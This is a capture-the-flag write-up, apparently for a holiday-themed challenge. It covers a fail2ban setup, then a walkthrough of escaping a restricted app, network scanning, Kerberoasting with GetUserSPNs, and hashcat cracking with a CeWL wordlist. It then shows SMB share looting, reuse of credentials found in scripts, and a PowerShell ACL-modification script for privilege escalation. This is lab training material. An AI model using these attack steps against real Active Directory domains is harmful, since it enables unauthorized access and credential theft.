Kerberoasting on an Open Fire

Getting the hints

In order to black the naughty IPs and get the hint, fail2ban needs to be configure as the following:

/etc/fail2ban/filter.d/hohono.conf

[Definition]
failregex = ^.* Failed login from <HOST> for .*$
            ^.* Invalid heartbeat .* from <HOST>$
            ^.* from <HOST> rejected .*$
            ^.* <HOST> sent a malformed .*$

/etc/fail2ban/jail.d/hohono.conf

[hohono]
enabled = true
logpath = /var/log/hohono.log
findtime = 3600
maxretry = 10
filter = hohono
action = hohono

/etc/fail2ban/action.d/hohono.conf

[Definition]
actionban   = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>

The challenge

Getting access to the machine

To start the challenge, we need to escape this application:

Click on CTRL+D to get Python console:

Use os.system to get shell

import os
os.system('/bin/bash')

Let’s make /bin/bash out default shell using chsh:

Recon

rzcmxnacvh@grades:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 21967028  bytes 2041704471 (2.0 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24790319  bytes 3583308774 (3.5 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

rzcmxnacvh@grades:~$ nmap 172.17.0.2/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-06 04:29 UTC
Nmap scan report for 172.17.0.1
Host is up (0.00050s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap scan report for grades.elfu.local (172.17.0.2)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.17.0.3
Host is up (0.00051s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

<strong>Nmap scan report for 172.17.0.4
</strong>Host is up (0.00056s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
42/tcp   open  nameserver
<strong>53/tcp   open  domain</strong>
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
1024/tcp open  kdm
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap scan report for 172.17.0.5
Host is up (0.00054s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 3.01 seconds

Intersting SMB service (port 445) in the machines *3,*4, and *5. Let’s have a look on what we have access to:

ovvvhdiilp@grades:~$ smbclient -L 172.17.0.4
Enter WORKGROUP\ovvvhdiilp's password: 
Anonymous login successful

Sharename       Type      Comment
---------       ----      -------
netlogon        Disk      
sysvol          Disk      
elfu_svc_shr    Disk      elfu_svc_shr
research_dep    Disk      research_dep
IPC$            IPC       IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

It seems that our goal will be to have access to research_dep! Let’s do it.

Finding the Domain Controller

According to the hint (next screenshot). Some other interesting machines (except the 172.17.0.4/28 ones) are present with the range 10.x.x.x. Let’s discover the:

# Get 10.x.x.x ips within the network
ovvvhdiilp@grades:~$ ip route
default via 172.17.0.1 dev eth0 
10.128.1.0/24 via 172.17.0.1 dev eth0 
10.128.2.0/24 via 172.17.0.1 dev eth0 
10.128.3.0/24 via 172.17.0.1 dev eth0 
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2

Finding the domain controller. We run the nmap script dap-rootdse on the different IP ranges:

ovvvhdiilp@grades:~$ nmap -sT -Pn -n --open 10.128.1.0/24 -sV -p389 --script ldap-rootdse
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 01:25 UTC
Nmap scan report for 10.128.1.53
Host is up (0.0011s latency).

PORT    STATE SERVICE VERSION
389/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: elfu.local, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 3
|       forestFunctionality: 3
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=elfu,DC=local
|       ldapServiceName: elfu.local:dc01$@ELFU.LOCAL
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|     ...
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=elfu,DC=local
|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=elfu,DC=local
|       namingContexts: DC=elfu,DC=local
|       namingContexts: CN=Configuration,DC=elfu,DC=local
|       namingContexts: CN=Schema,CN=Configuration,DC=elfu,DC=local
|       namingContexts: DC=DomainDnsZones,DC=elfu,DC=local
|       namingContexts: DC=ForestDnsZones,DC=elfu,DC=local
|       isSynchronized: TRUE
|       highestCommittedUSN: 174816
|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
|       dnsHostName: DC01.elfu.local
|       defaultNamingContext: DC=elfu,DC=local
|       currentTime: 20220107012603.0Z
|_      configurationNamingContext: CN=Configuration,DC=elfu,DC=local
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 8.38 seconds

Getting more details about Ldap

Knowing the domain controller, 10.128.1.53 we can now launch the ldapdomaindump which is present in the grades machine:

ovvvhdiilp@grades:~$ ldapdomaindump -u "ELFU\ovvvhdiilp" "ldap://10.128.1.53:389" Password: 
[*] Connecting to host... 
[*] Binding to host 
[+] Bind OK 
[*] Starting domain dump 
[+] Domain dump finished

It generates the above files that provide details about the domain stored in in different formats, at this stage this data doesn’t make us really progress. let’s keep it aside, we will for sure need it later.

Finding service principal names

Let’s new try the PowerShell script GetUserSPNs.py which is present in the machine:

Interesting. it lists up elfu_svc who is apparently owning some of the shared SMB we discovered in the beginning which is elfu_svc_shr located in 172.17.0.4.

Let’s execute the same GetUserSPNs.py with -request argument to request a TGS

We now have a krb5tgs that we need to decrypt in order to get the user elfu_svc’s password.

Getting elfu_svc password

I used hashcat for this decryption. In my first attempts, I used based on rockyou.txt as a word list, it didn’t work. Based on the hints, I then added the rule OneRuleToRuleThemAll.rule which made hashcat estimate the decryption to take more than three days. Deception. I interrupted it and double checked the hints – again.

I finally realised that I need to use a dedicated world list that can be generated using CeWL. CeWL well parse a website (URL provided as argument) and gather all the present words. I used the ELF University website as argument in my fist failed attempt. I then and based on the hints added the argument –with-number to also include to strings that contain number.

ruby cewl -d 10 -m 5 --with-number -w elfu_words_with_numbers.txt https://register.elfu.org/register

I fed the new wordlist to hashcat, and bingo w’ve finally got elfu_svc password Snow2021!

Getting ssh access to the domain controller

Let’s now have a look on the shared folder of elfu_svc:

It contains tons of PS1 scripts. Promising. let’s analyse their content. I wrote this short Python script to download them.

import os
content = open('all_files_in_elfu_svc_shr.txt').readlines()
for line in content:
    try:
script_name=line.split('    ')[0]
print (script_name)
cmd='smbclient -E -U elfu_svc \\\\\\\\172.17.0.4\\\\elfu_svc_shr \"Snow2021!\" -c "get '+script_name+'"'
print(cmd)
os.system(cmd)
    except:
pass

I first tried to grep “passoword”, “username” and similar. I find some credentials like a username called “LabAdmin” that I tested in different location but they weren’t interesting.

rtscahotny@grades:~/all_files_in_elfu_svc$ grep -i password= *
CreateVMFleetDisk.ps1:        $AdminPassword=Read-Host
Generate-SymbolsInNavContainer.ps1:            $ProcessArguments += ", ntauthentication=0, username=""$($sqlCredential.UserName)"", password=""$([System.Runtime.InteropServices
.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sqlCredential.Password)))"""
LabConfig.ps1:$LabConfig=@{ DomainAdminName='LabAdmin'; AdminPassword='LS1setup!'; Prefix = 'MSLab-' ; DCEdition='4'; Internet=$true ; AdditionalNetworksConfig=@(); VMs=@()}
LabConfig.ps1:        AdminPassword="LS1setup!";                   # Used during 2_CreateParentDisks. If changed after, it will break the functionality of 3_Deploy.ps1
New-NavContainer.ps1:                         "--env securePassword=$encPassword",
New-NavContainer.ps1:                             "--env databaseSecurePassword=$encDatabasePassword"
New-NavContainer.ps1:                             "--env encryptionSecurePassword=$encDatabasePassword"

I then make a grep with “elfu” and I got the following interesting resutl:

let’s have a look on the script GetProcessInfo.ps1:

And execute it:

The script makes the used remote_elf make an ssh connexion to the DC and gather the running processes. Inspired by this script, we now can login to the DC using the following lines:

$SecStringPassword="76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred

Giving my user access to research_dep shared folder

Once in the domain controller, I made an attempt to run the following PS1 script to grand my user permission to the Domain Admin group:

$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=elfu,DC=local"
$username = "rtscahotny"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"),([System.Security.AccessControl.AccessControlType] "Allow"),$propGUID,$inheritanceType,$nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions=$domainDirEntry.get_Options()
$secOptions.SecurityMasks=[System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.psbase.get_ObjectSecurity().addAccessRule($ACE)
$domainDirEntry.psbase.CommitChanges()
$domainDirEntry.dispose()

It didn’t worked saying that it cannot commit changes.

So we need to find another way giving my user access to the shared research folder.

As our goal is to gain access to a research shared folder, let’s make a grep with “research” on the files we previously got using ldapdomaindump.

As you can see we now know that members of the group “Research Department” have access to the shared folder we are interested in. I now need to append my user to the this group. What about changing “Domain Admins” by “Research Department” in first line of the above script? let’s give this a try: